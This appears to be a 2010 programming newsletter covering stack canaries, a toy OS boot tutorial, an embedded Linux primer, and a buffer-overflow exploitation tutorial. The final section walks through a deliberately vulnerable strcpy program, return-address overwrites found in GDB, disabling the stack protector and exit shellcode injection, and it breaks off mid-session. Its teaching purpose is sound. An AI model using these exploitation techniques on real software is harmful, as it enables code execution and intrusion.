Community Newsletter

Issue 2, March 2010

In this issue:

This month's authors:

Manohar Vanga

Random Tricks

1. Canaries and Buffer Overflows

In response to last month's article "Buffer Overflow Attacks Demonstrated", Kartik Nayak wrote in saying:

I tried the code given by you in 'Buffer Overflow Attacks
Demonstrated'. But it didnt work the way you said. Instead this is
what my console shows:

$ ./a.out
Password: asdf
Password: asdf
Password: cookies
Not-so-top secret password protected area
$ ./a.out
Password: aaaaaaaaaaaaaaaaaaaa          //its 'a' 20 times here
Password: aaaaaaaaaaaaaaaaaaaa
Password: aaaaaaaaaaaaaaaaaaaaa
Password: aaaaaaaaaaaaaaaaaa
Password: aaaaaaaaaaaaaaaaaa
Password: aaaaaaaaaaaaaaaaaaa
Password: cookies
Not-so-top secret password protected area
*** stack smashing detected ***: ./a.out terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb8063558]
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x0)[0xb8063510]
./a.out[0x8048542]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb7f7f685]
./a.out[0x8048421]
======= Memory map: ========
08048000-08049000 r-xp 00000000 08:11 1230086    /home/kartik/Desktop/a.out
08049000-0804a000 r--p 00000000 08:11 1230086    /home/kartik/Desktop/a.out
0804a000-0804b000 rw-p 00001000 08:11 1230086    /home/kartik/Desktop/a.out
09364000-09385000 rw-p 09364000 00:00 0          [heap]
b7f68000-b7f69000 rw-p b7f68000 00:00 0
b7f69000-b80c1000 r-xp 00000000 08:11 1303547
/lib/tls/i686/cmov/libc-2.8.90.so
b80c1000-b80c3000 r--p 00158000 08:11 1303547
/lib/tls/i686/cmov/libc-2.8.90.so
b80c3000-b80c4000 rw-p 0015a000 08:11 1303547
/lib/tls/i686/cmov/libc-2.8.90.so
b80c4000-b80c7000 rw-p b80c4000 00:00 0
b80cb000-b80d8000 r-xp 00000000 08:11 1286211    /lib/libgcc_s.so.1
b80d8000-b80d9000 r--p 0000c000 08:11 1286211    /lib/libgcc_s.so.1
b80d9000-b80da000 rw-p 0000d000 08:11 1286211    /lib/libgcc_s.so.1
b80da000-b80de000 rw-p b80da000 00:00 0
b80de000-b80f8000 r-xp 00000000 08:11 1286163    /lib/ld-2.8.90.so
b80f8000-b80f9000 r-xp b80f8000 00:00 0          [vdso]
b80f9000-b80fa000 r--p 0001a000 08:11 1286163    /lib/ld-2.8.90.so
b80fa000-b80fb000 rw-p 0001b000 08:11 1286163    /lib/ld-2.8.90.so
bf8e6000-bf8fb000 rw-p bffeb000 00:00 0          [stack]
Aborted

Why did this happen? The stack overflow did not happen earlier but it
gave an error later.

Regards,
Kartik Nayak

The stack smashing error above comes from a buffer overflow protection mechanism that uses special values called canaries to detect when an overflow occurs.

Canaries, or canary words, are known values placed between a buffer and the control data on the stack to detect buffer overflows. When the buffer overflows, the first data to be corrupted is the canary, so a failed verification of the canary is an alert that an overflow has happened. The check is not done by the kernel: GCC inserts code that stores the canary when a function is entered and verifies it just before the function returns. If the value has changed, the program calls glibc's __stack_chk_fail, which prints the "stack smashing detected" message and aborts the program (hence the SIGABRT).

The terminology is a reference to the historic practice of using canaries in coal mines, since they would be affected by toxic gases earlier than the miners, thus providing a biological warning system.
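
To make the idea concrete, here is a minimal sketch in C that simulates a canary by hand. It is not how GCC implements its stack protector; the frame layout, the canary value and the name canary_survives are all assumptions made up for illustration. A small byte array stands in for the stack frame: a 20 byte buffer, then a 4 byte canary, then 4 bytes playing the role of the return address.

```c
#include <assert.h>
#include <string.h>

#define BUF_SIZE    20   /* size of the simulated password buffer */
#define CANARY_SIZE 4
#define FRAME_SIZE  (BUF_SIZE + CANARY_SIZE + 4)  /* buffer, canary, "return address" */

/* Arbitrary known value; a real canary is chosen at program start. */
static const unsigned char CANARY[CANARY_SIZE] = { 0xde, 0xc0, 0xad, 0x0b };

/*
 * Copy input (with its terminating NUL) into the simulated frame without
 * checking it against BUF_SIZE, then verify the canary.
 * Returns 1 if the canary is intact, 0 if it was overwritten.
 */
int canary_survives(const char *input)
{
    unsigned char frame[FRAME_SIZE];
    size_t len = strlen(input) + 1;

    assert(len <= FRAME_SIZE);  /* keep the simulation itself memory-safe */

    memset(frame, 0, sizeof frame);
    memcpy(frame + BUF_SIZE, CANARY, CANARY_SIZE);  /* "function entry": place the canary */

    memcpy(frame, input, len);                      /* the unchecked copy */

    /* "function exit": compare against the known value */
    return memcmp(frame + BUF_SIZE, CANARY, CANARY_SIZE) == 0;
}
```

With this layout, a 19 character string still fits (19 characters plus the NUL fill the buffer exactly), while a 20 character string pushes its NUL terminator into the first canary byte and the check fails. The check only runs once, after the copy, which mirrors the fact that the real check fires when the function returns.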

When you enter a string longer than 20 characters in this program, the canary word gets corrupted and the program aborts. The abort happens a little later than the overflow itself because the canary is only verified when the function that owns the buffer returns, which here is after the protected area has been printed. The stack protector also typically places arrays right next to the canary, above the other local variables, so an overflow tends to hit the canary before it can reach any other local variable, which is probably why it didn't work as planned!

It seems your version of GCC enables stack protection by default. Try compiling it using the "-fno-stack-protector" flag like this:

$ gcc -fno-stack-protector example.c
$ ./a.out

There is actually a much simpler way to break through the program that struck me a day or two after releasing the first issue. This will work with any executable (stripped or not):

$ strings ./over
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
__isoc99_scanf
puts
printf
__libc_start_main
GLIBC_2.7
GLIBC_2.0
PTRh
<Y^_]
[^_]
Password: 
cookies
Not-so-top secret password protected area
$ 

Oh well! I guess it's just another reason to never hardcode any sensitive stuff into executables.
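
The reason strings finds the password so easily is that it just scans the file for runs of printable characters (four or more by default). Here is a minimal sketch of that scan in C. It is a simplification, not the actual binutils implementation, and the name count_printable_runs is made up for illustration.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>

/*
 * Count the runs of printable characters in data[0..len) that are at
 * least min_len characters long. This is the core idea behind strings;
 * the real tool prints each run instead of counting it.
 */
size_t count_printable_runs(const unsigned char *data, size_t len, size_t min_len)
{
    size_t runs = 0;     /* runs found so far */
    size_t current = 0;  /* length of the run we are currently inside */
    size_t i;

    assert(data != NULL || len == 0);

    for (i = 0; i < len; i++) {
        if (isprint(data[i])) {
            current++;
        } else {
            if (current >= min_len)
                runs++;
            current = 0;
        }
    }
    if (current >= min_len)  /* a run may end at the end of the data */
        runs++;

    return runs;
}
```

A hardcoded password is stored in the executable as exactly such a run of printable bytes, so no amount of stripping symbols will hide it.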

2. Unmaintainable Code

I read an excellent article long ago on how to write unmaintainable code and recently found it buried in my bookmarks! While the article describes techniques from Java, the techniques work for most modern languages! It's a great way to really irritate your colleagues! Read the article here.

3. Bash Tricks

Here are a couple of tricks I found to speed up my bash usage!

4. xkcd Downloader Script

For those of you like me, who are fans of xkcd and want to download it to their hard drive for some reason, here's a bash script I wrote to download all of them:

xkcd Downloader (xkcdget)
#!/bin/bash

rm -f index.html
# This value will need to be changed based on the latest number!
for i in {1..717}; do
    # Little prank that took me a while to notice!
    if [ "$i" -eq 404 ]; then
        continue
    fi
    wget -q "http://xkcd.com/$i/"
    # Pull the image URL out of the "Image URL" line of the page
    url=$(grep "Image URL" index.html | cut -d ' ' -f 5 | cut -d '<' -f 1)
    filename=$(echo "$url" | cut -d / -f 5)
    newname="${i}_${filename}"
    if [ -f "$newname" ]; then
        echo "Comic #$i exists...skipping"
        rm index.html
        continue
    fi
    if [ -f "$filename" ]; then
        echo "Incomplete download for comic #$i"
        rm "$filename"
    fi
    echo "Downloading comic #$i"
    wget -q "$url"
    mv "$filename" "$newname"
    rm index.html
done

I now have an archive of xkcd's on my cellphone to read on the bus!

Writing an Operating System - Part I

I've always wanted to write my own operating system that could be at least self-hosting. I don't really care to make it big, complex and efficient. I don't intend for it to be another Take-that-Linus-OS. I just want to have fun writing it! I have written a few operating systems in the past but I have never really been satisfied with the outcomes. In this set of articles I hope to start work on a new toy operating system that will hopefully become a useful tool for people to learn from. Just to concretize things a bit, below are my expectations for this operating system:

  • Self-Hosting - It should be able to run enough software to be able to compile its own source
  • When in doubt, mimic Linux - The simple reason for this is that the code is readily available
  • Keep It Simple Stupid - If something starts getting too complex, backtrack and redesign. Simplicity over efficiency
  • Clean comments - Keep the code commented enough for people to understand
  • Target the Intel x86 - While something like the ARM7 would be simpler, x86 is readily available to most people. It is also readily emulated. We will use 32 bit protected mode.
  • Multitasking, Filesystem, ELF Executables, POSIX-subset system calls, Simple shell implementation, Virtual memory, Ports of some system utilities.

NOTE: I use NASM for assembly rather than GAS, as I find the Intel syntax to be cleaner.

In this article we make it boot up!

Booting Up!

How does the Intel x86 PC boot up anyway? We won't bother with the assembly level details of how things boot up. They are quite simple and well documented in many different places. A good set of examples is provided in this article or this one. We will use GRUB (GRand Unified Bootloader) to get started. Some of the advantages I have found of using GRUB to boot up your operating system are:

  • Sets up protected mode for you
  • Provides you with memory information
  • Provides dynamic loading of modules
  • Can read from many different file systems

There are many more but the above four have, in my past, proved to be very useful during the early stages of development. Throughout the tutorials, we will use Qemu to emulate our machine and test our operating system. I have gone ahead and made a GRUB bootable floppy image for use with Qemu. If you want to make your own bootable GRUB floppy, Google is your friend.

Let's try and boot with the floppy on Qemu:

$ qemu -fda floppy.img -boot a

If you don't have Qemu installed, you can install it using:

$ sudo apt-get install qemu

Once you run it, you should get a familiar GRUB screen with an entry called "ToyOS Kernel". When you press enter you should get an error saying "Error 15: File not found". This is because we are still to write the main kernel. Let's do that now!

The Miniature Kernel

GRUB has defined a specification for booting called the multiboot specification. The document gives an overview of the specification (read: long and boring). The good part is it provides us with an example kernel that we can use to start off with in the Examples section. Below is a stripped down version of the code with comments for people with absolutely no knowledge about low-level programming:

Bootup Code (boot.s)
global loader                           ; making entry point visible to linker
extern kmain                            ; kmain is defined elsewhere

; Setting up the Multiboot header - see GRUB docs for details
; These are just data definitions (like a #define)
MODULEALIGN equ  1<<0                   ; align loaded modules on page boundaries
MEMINFO     equ  1<<1                   ; provide memory map
FLAGS       equ  MODULEALIGN | MEMINFO  ; this is the Multiboot 'flag' field
MAGIC       equ    0x1BADB002           ; This 'magic number' lets bootloader find the header
CHECKSUM    equ -(MAGIC + FLAGS)        ; MAGIC + FLAGS + CHECKSUM must add up to 0 (mod 2^32)

section .text                           ; Start of code section
align 4
MultiBootHeader:                        ; Use the above definitions to build the multiboot header
    dd MAGIC
    dd FLAGS
    dd CHECKSUM

; Initial kernel stack space (just a define)
STACKSIZE equ 0x4000                    ; 16kb.

loader:
    mov esp, stack+STACKSIZE            ; set up the stack
    
    push eax                            ; pass Multiboot magic number
    push ebx                            ; pass Multiboot info structure

    call  kmain                         ; call kernel proper

hang:                                   ; hang if the kernel returns
    jmp   hang
 
section .bss                            ; uninitialized data section
alignb 4
stack:
    resb STACKSIZE                      ; reserve 16 KB of stack on a doubleword boundary

The above code creates the multiboot header so that GRUB can recognize the kernel. It then sets up a 16 KB stack and calls our kernel main function, passing it the multiboot magic number and a pointer to the multiboot information structure. Notice that kmain is declared extern, which means we still need to define it. Let's do that now:

Kernel main (main.c)
void kmain( void* mbd, unsigned int magic )
{
    /* Something did not go according to the spec: we were not */
    /* loaded by a Multiboot bootloader, so just hang. */
    if(magic != 0x2BADB002)
        for(;;);

    /* Print a letter to screen to see everything is working: */
    unsigned char *videoram = (unsigned char *) 0xb8000;
    videoram[0] = 65; /* character 'A' */
    videoram[1] = 0x07; /* foreground, background color */

    /* Write our kernel here. Hang till the next tutorial :) */
    for(;;);
}

The above code checks that the magic value is correct. If not, it simply hangs. If it is, it prints a character to the upper left corner of the screen and hangs. Remember that the text mode screen is 80x25 characters and each character cell is represented by 2 bytes (the lower one for the ASCII value and the higher one for the colors). Before we can compile it, let us organize the code in memory using a linker script:

Linker Script (linker.lds)
ENTRY (loader)

SECTIONS{
    . = 0x00100000;

    .text :{
        *(.text)
    }

    .rodata ALIGN (0x1000) : {
        *(.rodata)
    }

    .data ALIGN (0x1000) : {
        *(.data)
    }

    .bss : {
        sbss = .;
        *(COMMON)
        *(.bss)
        ebss = .;
    }
}

The above script tells the linker that the entry point is loader (which we defined in boot.s). This is like specifying that a program should start at main(). We then specify how the different sections of the program are organized in memory. The starting point is at 1MB (0x00100000). Then follow the text section, the read-only, constant data (such as character strings) section, the data section (initialized data goes here) and finally the uninitialized data section.

Below is a Makefile to compile the code into an ELF that GRUB can load at boot time:

Makefile (Makefile)
AS=nasm
CC=gcc
LD=ld

ASFLAGS=-f elf
CFLAGS=-ggdb -Wall -Wextra -nostdlib -nostdinc -fno-builtin -fno-stack-protector -nostartfiles -nodefaultlibs
LDFLAGS=-Tlinker.lds

SOURCES=boot.o main.o
KERNEL=toyos

all: $(SOURCES) link

%.o: %.s
    $(AS) $(ASFLAGS) $<

%.o: %.c
    $(CC) $(CFLAGS) -c $<

link:
    $(LD) $(LDFLAGS) $(SOURCES) -o $(KERNEL)

clean:
    rm -f *.o $(KERNEL)

Here are some points to note. We specify the output format as ELF using -f elf in the ASFLAGS variable, which is used when assembling all files ending with .s (assembly files). Remember that we are booting our own kernel and the library functions that we are accustomed to are not available to us. We disable them with the -nostdlib and -nostdinc additions to the CFLAGS variable, which is used when compiling C sources. We also add some debugging support as Qemu provides debugging capabilities with GDB.

That's it! Go ahead and build it!

$ make
nasm -f elf boot.s
gcc -ggdb -Wall -Wextra -nostdlib -nostdinc -fno-builtin -fno-stack-protector -nostartfiles -nodefaultlibs -c main.c
main.c:1: warning: unused parameter 'mbd'
ld -Tlinker.lds boot.o main.o -o toyos
$ ls
Makefile  boot.o  boot.s  floppy.img  linker.lds  main.c  main.o  toyos

The toyos file is the output kernel. Let us now copy the binary to our floppy image:

$ sudo mount -o loop floppy.img /mnt
$ sudo cp toyos /mnt/boot/kernel
$ sudo umount /mnt

Now try running Qemu with the floppy image!

$ qemu -fda floppy.img -boot a

The other junk on the screen is there because we haven't really cleared the screen contents. We will clear this up in the next tutorial! If you are impatient like me, you can write 2x80x25 zero bytes ('\0') to the video memory in main.c before putting the character on the screen.

Kernel main (main.c)
void kmain( void* mbd, unsigned int magic )
{
    ...

    unsigned char *videoram = (unsigned char *) 0xb8000;
    /* Clear the screen */
    int i;
    for(i=0;i<2*80*25;i++)
        videoram[i] = '\0';
    videoram[0] = 65;
    videoram[1] = 0x07;

    ...
}
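
The text mode layout described earlier (80x25 cells, two bytes per cell) also tells us where any other cell lives. Here is a minimal sketch of that arithmetic, written so that it can be tried on the host against an ordinary array before it goes anywhere near the kernel. The names vga_offset and vga_put are made up for illustration. In the kernel itself you would pass (unsigned char *) 0xb8000 as vram and drop the assert, since we build with -nostdinc.

```c
#include <assert.h>
#include <stddef.h>

#define VGA_COLS 80
#define VGA_ROWS 25

/*
 * Byte offset of the cell at (row, col): rows are stored one after
 * another and every cell takes two bytes.
 */
size_t vga_offset(unsigned row, unsigned col)
{
    assert(row < VGA_ROWS && col < VGA_COLS);
    return 2u * ((size_t)row * VGA_COLS + col);
}

/* Write one character and its color attribute into the given cell. */
void vga_put(unsigned char *vram, unsigned row, unsigned col,
             char ch, unsigned char attr)
{
    size_t off = vga_offset(row, col);

    vram[off] = (unsigned char)ch;  /* lower byte: ASCII value */
    vram[off + 1] = attr;           /* higher byte: colors */
}
```

For example, vga_put(vram, 0, 0, 'A', 0x07) does the same thing as the two videoram assignments in main.c, and the last cell of the screen (row 24, column 79) sits at offset 3998, just below the 2x80x25 = 4000 bytes that the clearing loop covers.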

Absolutely thrilling isn't it? We have just written a miniature kernel! Happy hacking!

Embedded Linux Development Primer

There have been a lot of mails requesting tutorials for getting started with embedded systems development so I thought I would write one to get people started. Embedded systems development is heavily dependent on the hardware you are developing for. To keep things neutral and fun for everybody, this article focuses on setting up a cross compiling toolchain and using it to boot into the U-Boot bootloader on Qemu-ARM (the Qemu ARM CPU emulator).

The Toolchain

In this article, we will use ELDK (Embedded Linux Development Kit) as the toolchain. It is available for MIPS, ARM and PowerPC platforms and can be downloaded at the ELDK website. It also comes with excellent documentation so that is a good plus point. There are many other solutions available out there but this article will focus on setting up and using ELDK.

ELDK is provided as an ISO image that we will download and use. Download it using:

$ wget -c http://ftp.denx.de/pub/eldk/4.2/arm-linux-x86/iso/arm-2008-11-24.iso

Let us mount the ISO and run the installer in the main directory. We will install it into the /opt/eldk-4.2 directory:

$ sudo mount -o loop arm-2008-11-24.iso /mnt
$ sudo mkdir /opt/eldk-4.2
$ cd /mnt
$ sudo ./install -d /opt/eldk-4.2
$ cd -
$ sudo umount /mnt

And we have a cross compiling toolkit! Most programs look for the CROSS_COMPILE variable for a cross compiling prefix. For example, the ELDK ARM cross compiler is called arm-linux-gcc so we need to set CROSS_COMPILE to "arm-linux-". Since we have installed to a directory that isn't in the $PATH variable, we need to add the folder location to the prefix as well. I set up aliases to do the job for me:

$ echo "alias setcc='export CROSS_COMPILE=/opt/eldk-4.2/usr/bin/arm-linux-'" >> ~/.bashrc
$ echo "alias unsetcc='export CROSS_COMPILE='" >> ~/.bashrc

To cross compile, we can use the setcc alias (open a new terminal or run "source ~/.bashrc" first so that the aliases are defined). Once we are done, we can use the unsetcc alias to switch back to our normal compiler.

U-Boot

U-Boot is a bootloader for embedded systems. It provides excellent functionality that makes life really simple for embedded developers. I will not go into details as it has great documentation available on its website. We will now configure and compile U-Boot. Let us get right to it:

$ git clone git://git.denx.de/u-boot.git
$ cd u-boot
$ setcc
$ make versatilepb_config
$ make

Once this is done, we will have a u-boot.bin file that we can load into Qemu if we want to test it (or if we are using real hardware, we would burn it onto the ROM).

Note: If you want to use U-Boot with Linux, you will need to put the U-Boot mkimage utility in the $PATH in order to create a uImage (U-Boot Image). We can copy that into a location specified in the $PATH variable:

$ cp ~/source/u-boot/tools/mkimage ~/bin

Booting Up!

What we need to do is to create a ROM image with the U-Boot binary burned onto it. We can use dd to get that done:

$ cat ~/qemu-arm/u-boot.bin /dev/zero | dd bs=1k count=256 > ~/qemu-arm/romimg
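
What this pipeline produces is simply the U-Boot binary followed by zero bytes, cut off at 256 KB (bs=1k count=256). Here is a minimal sketch of the same thing in C, assuming every 1 KB block that dd reads from the pipe is a full block. The name make_rom_image is made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define ROM_SIZE (256u * 1024u)  /* bs=1k count=256 */

/*
 * Fill rom[0..ROM_SIZE) with the image followed by zero bytes. An image
 * larger than ROM_SIZE is truncated, just as dd would stop after 256
 * blocks. Returns the number of image bytes that were copied.
 */
size_t make_rom_image(const unsigned char *image, size_t image_len,
                      unsigned char *rom)
{
    size_t copied = image_len < ROM_SIZE ? image_len : ROM_SIZE;

    assert(image != NULL && rom != NULL);

    memcpy(rom, image, copied);                  /* the "cat u-boot.bin" part */
    memset(rom + copied, 0, ROM_SIZE - copied);  /* the "/dev/zero" part */

    return copied;
}
```

The padding matters because the emulated flash device expects an image of a fixed size rather than a file that ends wherever the binary happens to end.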

We can now run Qemu-ARM to emulate the ARM system with the following command:

$ qemu-system-arm -m 64 -M versatilepb -kernel /dev/null \
-mtdblock ~/qemu-arm/romimg -serial telnet:localhost:1200,server -S -s -gdb tcp::1234

The above command emulates an ARM system with 64MB of RAM. The versatile board is emulated with a blank kernel image (if you want to boot a Linux kernel image, it would go in place of /dev/null) and our previously created memory image. We also route the serial output via the telnet protocol to localhost:1200. The -S and -s options start it with debugging enabled and execution paused. The GDB port is specified as 1234.

In another window, Telnet locally to get the serial console:

$ telnet localhost 1200

In the old window, fire up the ARM-GDB and do the following:

$ ${CROSS_COMPILE}gdb
GNU gdb Red Hat Linux (6.7-2rh)
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "--host=i686-pc-linux-gnu --target=arm-linux".
The target architecture is set automatically (currently arm)

(gdb) target remote localhost:1234
(gdb) load u-boot
(gdb) cont

You should now see the serial output on the Telnet port:

U-Boot 2009.08 (Mar 10 2010 - 00:34:58)

DRAM:   0 kB
## Unknown FLASH on Bank 1 - Size = 0x00000000 = 0 MB
Flash:  0 kB
*** Warning - bad CRC, using default environment

In:    serial
Out:   serial
Err:   serial
Net:   SMC91111-0
VersatilePB #

We have successfully set up a cross compiling toolchain, cross compiled the U-Boot bootloader for ARM and booted it up on Qemu. I have not gone into details on how to boot up Linux as it would be an entire article by itself. Perhaps in the future!

Happy Hacking!

Buffer Overflow Attacks Demonstrated - Again

I didn't plan on writing a second part to my previous article but I've been having so much fun with buffer overflows that I just had to share it! In this article we will try and break apart a simple program and make it execute whatever code we want it to! Excited yet? Read on!

I've always "heard" about how buffer overflows can be exploited to execute any piece of code that an attacker wants executed. I never really understood how it worked until I recently sat down and decided to figure out how to do it myself. After a bit of experimenting it clicked, and in this article I'll walk you through how I managed to do it. Let's start off with a stupid program that copies a string without overflow checks:

#include <stdio.h>
#include <string.h>
void get_input(char *arg)
{
    char str[128];
    strcpy(str, arg);
}

int main(int argc, char *argv[])
{
    if(argc != 2)
    {
        printf("argc != 2\n");
        return 1;
    }
    get_input(argv[1]);
    printf("End");
    return 0;
}

The program will take a string argument and copy it into a buffer of 128 bytes. We are now ready to use the handy tools we used last time to break this program apart. It's that simple!

Overwriting the Return Address

When a function is called, the return address is pushed onto the stack. If we overflow the buffer enough, we can overwrite the return address with whatever value we want. This gives us a nice hole to execute any piece of code we want! Let us first try and deconstruct the call stack in C and see how much we need to overwrite. In the program above we have a 128 character string to play around with. Let's use GDB to see what happens to the stack when we call the get_input function.

Remember that the call instruction pushes the return address onto the stack. When we enter the function, the old ebp register is pushed too as it is used for accessing local variables. Let us use GDB and see how we can overwrite the return address!

$ gcc -ggdb naive.c -o naive 
$ gdb ./naive
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/mvanga/Programming/test/shellcode/naive...done.
(gdb) set args `perl -e 'print "a"x150;'`
(gdb) break get_input 
Breakpoint 1 at 0x804841d: file naive.c, line 6.
(gdb) run
Starting program: /home/mvanga/Programming/test/shellcode/naive `perl -e 'print "a"x150;'`

Breakpoint 1, get_input (arg=0xbffff5d3 'a' <repeats 150 times>) at naive.c:6
6       strcpy(str, arg);
(gdb) 

We set a breakpoint in get_input and pass a string of 150 'a' (hexadecimal 0x61). Let's see what our stack frame looks like:

(gdb) info frame
Stack level 0, frame at 0xbffff380:
 eip = 0x804841d in get_input (naive.c:6); saved eip 0x8048478
 called by frame at 0xbffff3a0
 source language c.
 Arglist at 0xbffff378, args: arg=0xbffff5d3 'a' <repeats 150 times>
 Locals at 0xbffff378, Previous frame's sp is 0xbffff380
 Saved registers:
  ebp at 0xbffff378, eip at 0xbffff37c
(gdb) 

So the saved return address is 0x8048478 and it is stored on the stack at address 0xbffff37c. Let's see if it is getting overwritten by 150 characters first:

(gdb) step
7   }
(gdb) info frame
Stack level 0, frame at 0xbffff380:
 eip = 0x804842f in get_input (naive.c:7); saved eip 0x61616161
 called by frame at 0x61616169
 source language c.
 Arglist at 0xbffff378, args: arg=0x61616161 <Address 0x61616161 out of bounds>
 Locals at 0xbffff378, Previous frame's sp is 0xbffff380
 Saved registers:
  ebp at 0xbffff378, eip at 0xbffff37c
(gdb) 

Great! The return address got overwritten with 4 'a's (Hex 0x61). Let's see exactly how many characters we need to write in order to overwrite the return address. It should be the address of the saved eip minus the address of the string str. Let's see:

(gdb) print &str
$1 = (char (*)[128]) 0xbffff2f8
(gdb) print 0xbffff37c - 0xbffff2f8
$2 = 132
(gdb) 

So we need to write out 132 characters in order to reach the saved return address. We need another 4 to overwrite it! Let's try writing a known value (0x12345678) into the return address this time:

(gdb) set args `perl -e 'print "a"x132 . "\x12\x34\x56\x78";'`
(gdb) run
Starting program: /home/mvanga/Programming/test/shellcode/naive `perl -e 'print "a"x132 . "\x12\x34\x56\x78";'`

Breakpoint 1, get_input (arg=0xbffff5e1 'a' <repeats 132 times>, "\022\064Vx") at naive.c:6
6       strcpy(str, arg);
(gdb) info frame
Stack level 0, frame at 0xbffff390:
 eip = 0x804841d in get_input (naive.c:6); saved eip 0x8048478
 called by frame at 0xbffff3b0
 source language c.
 Arglist at 0xbffff388, args: arg=0xbffff5e1 'a' <repeats 132 times>, "\022\064Vx"
 Locals at 0xbffff388, Previous frame's sp is 0xbffff390
 Saved registers:
  ebp at 0xbffff388, eip at 0xbffff38c
(gdb) step
7   }
(gdb) info frame
Stack level 0, frame at 0xbffff390:
 eip = 0x804842f in get_input (naive.c:7); saved eip 0x78563412
 called by frame at 0x61616169
 source language c.
 Arglist at 0xbffff388, args: arg=0xbffff500 "\020"
 Locals at 0xbffff388, Previous frame's sp is 0xbffff390
 Saved registers:
  ebp at 0xbffff388, eip at 0xbffff38c
(gdb) 

It worked! The value is stored as 0x78563412 as the Intel architecture is little endian. Now we have a nice entry to execute whatever code we want. What if we stored a small program into the string we enter and then changed the return address to the address of our string? Wouldn't that be great? Let's try and see what the address of our string is and try to change the flow of execution to the string instead!

(gdb) print &str
$3 = (char (*)[128]) 0xbffff308
(gdb) set args `perl -e 'print "a"x132 . "\x08\xf3\xff\xbf";'`
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/mvanga/Programming/test/shellcode/naive `perl -e 'print "a"x132 . "\x08\xf3\xff\xbf";'`

Breakpoint 1, get_input (arg=0xbffff5e1 'a' <repeats 132 times>, "\b\363\377\277") at naive.c:6
6       strcpy(str, arg);
(gdb) step
7   }
(gdb) stepi
0x08048430 in get_input (arg=Cannot access memory at address 0x61616169
) at naive.c:7
7   }
(gdb) stepi
Cannot access memory at address 0x61616165
(gdb) x /10c $eip
0xbffff308: 97 'a'  97 'a'  97 'a'  97 'a'  97 'a'  97 'a'  97 'a'  97 'a'
0xbffff310: 97 'a'  97 'a'
(gdb) 

Whoa! That was cool! The program is now executing our little string full of 'a's! Remember that your system might be placing the stack in a different location. If you are following along, make the appropriate changes in your steps. Now the question is how do we store a little program into our string? Enter shellcoding!

A Simple Shellcode

A shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability (in our case the unchecked buffer overflow). It is called a "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine (hint: sneak peek of what's ahead!). Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode. Let's see how to write a simple shellcode that will simply exit the program without printing "End" to the screen.

Simple Exit Shellcode (exit.s)
[SECTION .text]           ; start the code section
global _start             ; entry point is default _start
_start:                   ; define our entry point
    xor eax, eax          ; eax = 0
    mov al, 1             ; syscall number 1 is exit()
    xor ebx, ebx          ; exit status 0 (xor avoids NUL bytes in the encoding)
    int 0x80              ; call the exit() syscall!

Now what? We now need to convert it into a string! Let us create the string version of our program using our old friend objdump!

$ nasm -f elf exit.s
$ objdump -d exit.o 

exit.o:     file format elf32-i386

Disassembly of section .text:

00000000 <_start>:
   0:   31 c0                   xor    %eax,%eax
   2:   b0 01                   mov    $0x1,%al
   4:   31 db                   xor    %ebx,%ebx
   6:   cd 80                   int    $0x80

To create the string version, we put in the disassembled hex values as characters using a \x prefix like so:

"\x31\xc0\xb0\x01\x31\xdb\xcd\x80"

Let's try and run the program now with this string as the input! Since our string is 8 bytes long (8 characters), we need to pad it with 132-8 characters and finally append the string's address. Our final string can be printed using perl as follows:

$ perl -e 'print "\x31\xc0\xb0\x01\x31\xdb\xcd\x80" . "a"x124 . "\x08\xf3\xff\xbf";'
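
The layout of that string (shellcode first, then padding up to the saved return address, then the new address in little endian byte order) can also be sketched in C. This is only an illustration of what the perl one-liner prints; the name build_payload and its parameters are made up, and the offset of 132 and the address 0xbffff308 are the values measured in the GDB session above, so they will differ on your system.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Write code, then 'a' padding up to ret_offset, then target as four
 * little endian bytes into out. out must have room for ret_offset + 4
 * bytes. Returns the total number of bytes written.
 */
size_t build_payload(const unsigned char *code, size_t code_len,
                     size_t ret_offset, uint32_t target,
                     unsigned char *out)
{
    assert(code_len <= ret_offset);  /* the code must fit before the return address */

    memcpy(out, code, code_len);
    memset(out + code_len, 'a', ret_offset - code_len);

    /* Least significant byte first, which is how x86 stores a 32 bit value */
    out[ret_offset + 0] = (unsigned char)(target & 0xff);
    out[ret_offset + 1] = (unsigned char)((target >> 8) & 0xff);
    out[ret_offset + 2] = (unsigned char)((target >> 16) & 0xff);
    out[ret_offset + 3] = (unsigned char)((target >> 24) & 0xff);

    return ret_offset + 4;
}
```

Calling it with the 8 byte exit shellcode, an offset of 132 and the address 0xbffff308 gives 8 + 124 + 4 = 136 bytes ending in 08 f3 ff bf. Keep in mind that the result is not NUL terminated, and that no byte in it may be zero, since strcpy would stop copying there.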

Note that the location of the stack on your system will vary. I realized only after getting this far that the kernel places each process's stack at a random address, so it is difficult to know in advance where our string will end up. Luckily, GDB turns this randomization off for the programs it starts (its "disable-randomization" setting is on by default), which makes it easy to test. If your GDB behaves differently, this technique might not work for you exactly as shown and might require some more tinkering.

$ ./naive `perl -e 'print "\x31\xc0\xb0\x01\x31\xdb\xcd\x80" . "a"x124 . "\x08\xf3\xff\xbf";'`
Segmentation fault
$ gdb ./naive 
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
